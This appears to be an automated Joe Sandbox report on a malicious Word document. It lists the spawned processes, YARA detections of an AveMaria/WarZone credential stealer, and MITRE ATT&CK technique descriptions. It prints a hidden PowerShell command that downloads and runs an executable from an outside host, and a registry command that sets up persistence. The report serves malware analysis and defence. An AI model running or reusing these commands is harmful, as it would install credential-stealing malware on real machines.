Reputation:	moderate

Analysis Process: powershell.exe PID: 1980 Parent PID: 2640

General

Start time:	10:45:42
Start date:	02/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Imagebase:	0x13fb00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.2100943704.0000000000360000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:	high

Analysis Process: powershell.exe PID: 2256 Parent PID: 2640

General

Start time:	10:45:43
Start date:	02/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Imagebase:	0x13fb00000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: microA.exe PID: 2508 Parent PID: 2776

General

Start time:	10:45:45
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Roaming\microA.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\microA.exe'
Imagebase:	0x60000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2171424499.0000000003369000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 40%, Metadefender, Browse Detection: 63%, ReversingLabs
Reputation:	low

Analysis Process: microA.exe PID: 972 Parent PID: 1980

General

Start time:	10:45:46
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Roaming\microA.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\microA.exe'
Imagebase:	0x60000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: microA.exe PID: 1960 Parent PID: 2256

General

Start time:	10:45:47
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Roaming\microA.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\microA.exe'
Imagebase:	0x60000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: verclsid.exe PID: 1948 Parent PID: 2640

General

Start time:	10:46:02
Start date:	02/08/2021
Path:	C:\Windows\System32\verclsid.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Imagebase:	0xff3f0000
File size:	11776 bytes
MD5 hash:	3796AE13F680D9239210513EDA590E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: notepad.exe PID: 2032 Parent PID: 2640

General

Start time:	10:46:03
Start date:	02/08/2021
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
Imagebase:	0xff9c0000
File size:	193536 bytes
MD5 hash:	B32189BDFF6E577A92BAA61AD49264E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: microA.exe PID: 2532 Parent PID: 2508

General

Start time:	10:46:16
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Local\Temp\microA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\microA.exe
Imagebase:	0xcb0000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 40%, Metadefender, Browse Detection: 63%, ReversingLabs

Analysis Process: microA.exe PID: 2372 Parent PID: 972

General

Start time:	10:46:16
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Local\Temp\microA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\microA.exe
Imagebase:	0xcb0000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: microA.exe PID: 2644 Parent PID: 1960

General

Start time:	10:46:16
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Local\Temp\microA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\microA.exe
Imagebase:	0xcb0000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, Author: unknown

Analysis Process: cmd.exe PID: 2648 Parent PID: 2532

General

Start time:	10:46:19
Start date:	02/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Imagebase:	0x4a080000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: images.exe PID: 1616 Parent PID: 2532

General

Start time:	10:46:20
Start date:	02/08/2021
Path:	C:\ProgramData\images.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\images.exe
Imagebase:	0x900000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 40%, Metadefender, Browse Detection: 63%, ReversingLabs

Analysis Process: reg.exe PID: 2244 Parent PID: 2648

General

Start time:	10:46:21
Start date:	02/08/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Imagebase:	0x860000
File size:	62464 bytes
MD5 hash:	D69A9ABBB0D795F21995C2F48C1EB560
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: images.exe PID: 1468 Parent PID: 1616

General

Start time:	10:46:45
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Local\Temp\images.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\images.exe
Imagebase:	0x150000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 40%, Metadefender, Browse Detection: 63%, ReversingLabs

Analysis Process: images.exe PID: 1312 Parent PID: 1616

General

Start time:	10:46:46
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Local\Temp\images.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\images.exe
Imagebase:	0x150000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: images.exe PID: 2168 Parent PID: 1616

General

Start time:	10:46:47
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Local\Temp\images.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\images.exe
Imagebase:	0x150000
File size:	525312 bytes
MD5 hash:	100C3E2649FD32CE6D7E108E1A2EBF0D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, Author: Joe Security

Analysis Process: cmd.exe PID: 2248 Parent PID: 2168

General

Start time:	10:46:50
Start date:	02/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe
Imagebase:	0x4a3b0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report N40-MR 311.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre